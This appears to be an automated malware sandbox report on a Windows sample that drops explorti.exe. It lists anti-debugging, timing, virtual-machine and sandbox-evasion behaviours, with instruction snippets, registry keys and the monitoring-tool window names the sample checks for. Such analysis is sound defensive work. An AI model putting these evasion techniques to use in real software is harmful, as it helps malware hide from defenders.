Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D09AA second address: 56D09FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6DEDEB4Ah 0x00000008 mov edi, 7AA77216h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FF3408102FCh 0x00000016 xchg eax, ebx 0x00000017 jmp 00007FF340810300h 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FF340810300h 0x00000022 push eax 0x00000023 jmp 00007FF3408102FBh 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D09FA second address: 56D0A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0A4C second address: 56D0A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0A52 second address: 56D0A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0A56 second address: 56D0A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF3408102FAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0A6B second address: 56D0AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF34080AB11h 0x00000009 add ecx, 5D1B2BA6h 0x0000000f jmp 00007FF34080AB11h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b jmp 00007FF34080AB0Ah 0x00000020 mov esp, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0AB0 second address: 56D0AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0AB4 second address: 56D0AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0C9C second address: 56E0D07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF340810306h 0x0000000f push eax 0x00000010 jmp 00007FF3408102FBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FF340810306h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov ecx, 607BC2CDh 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FF340810308h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0D07 second address: 56E0D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF34080AB17h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0D38 second address: 56E0D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810304h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E09BE second address: 56E09C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E09C3 second address: 56E09F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810302h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF340810307h 0x00000011 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Special instruction interceptor: First address: D9EAC1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Special instruction interceptor: First address: F4CDBA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Special instruction interceptor: First address: F759FE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 6FEAC1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 8ACDBA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 8D59FE instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Code function: 0_2_05750D23 rdtsc

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1239	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 430	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1294	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1276	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7804	Thread sleep time: -50025s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7780	Thread sleep count: 1239 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7780	Thread sleep time: -2479239s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760	Thread sleep count: 430 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760	Thread sleep time: -12900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7880	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776	Thread sleep count: 1294 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776	Thread sleep time: -2589294s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7788	Thread sleep count: 1276 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7788	Thread sleep time: -2553276s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: explorti.exe, explorti.exe, 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWU+vE
Source: 11NdzR12PS.exe, 00000000.00000002.1706850524.0000000000F29000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1730187640.0000000000889000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\11NdzR12PS.exe

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Process information queried: ProcessInformation

Hides threads from debuggers

Anti Debugging

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Code function: 0_2_05750D23 rdtsc

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006C645B mov eax, dword ptr fs:[00000030h]		5_2_006C645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006CA1C2 mov eax, dword ptr fs:[00000030h]		5_2_006CA1C2

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

Contains functionality to query CPU information (cpuid)

Source: explorti.exe, explorti.exe, 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 5_2_006AD312 cpuid

5_2_006AD312

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation